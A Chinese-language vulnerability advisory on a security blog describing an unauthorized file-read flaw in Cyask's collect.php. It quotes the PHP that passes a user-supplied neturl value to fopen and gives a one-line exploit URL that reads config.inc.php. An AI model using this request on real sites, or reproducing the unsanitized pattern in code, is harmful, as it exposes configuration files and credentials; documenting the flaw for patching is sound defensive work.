cyask知道系统collect.php页面存在越权漏洞

2023-12-04 0 266

影响版本: Cyask

程序介绍: Cyask国内较为多人使用的仿百度风格的Ask系统。

漏洞分析:

从Collect.php代码当中可以看到

else { /* 检查网址 */ $url=get_referer(); $neturl=emptyempty($_POST[\’neturl\’]) ? trim($_GET[\’neturl\’]) : trim($_POST[\’neturl\’]); $collect_url=emptyempty($neturl) ? $url : $neturl; $contents = ”; if($fid=@fopen($collect_url,”r“)) { do { $data = fread($fid, 4096); if (strlen($data) == 0) { break; } $contents .= $data; } while(true); fclose($fid); } else { show_message(’collect_url_error’, ”); exit; }

漏洞利用: http://www.target.com/collect.php?neturl=config.inc.php

解决方案: 厂商补丁: cyask ——- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 漏洞分析 cyask知道系统collect.php页面存在越权漏洞 https://www.u-9.cn/security/fenxi/73252.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务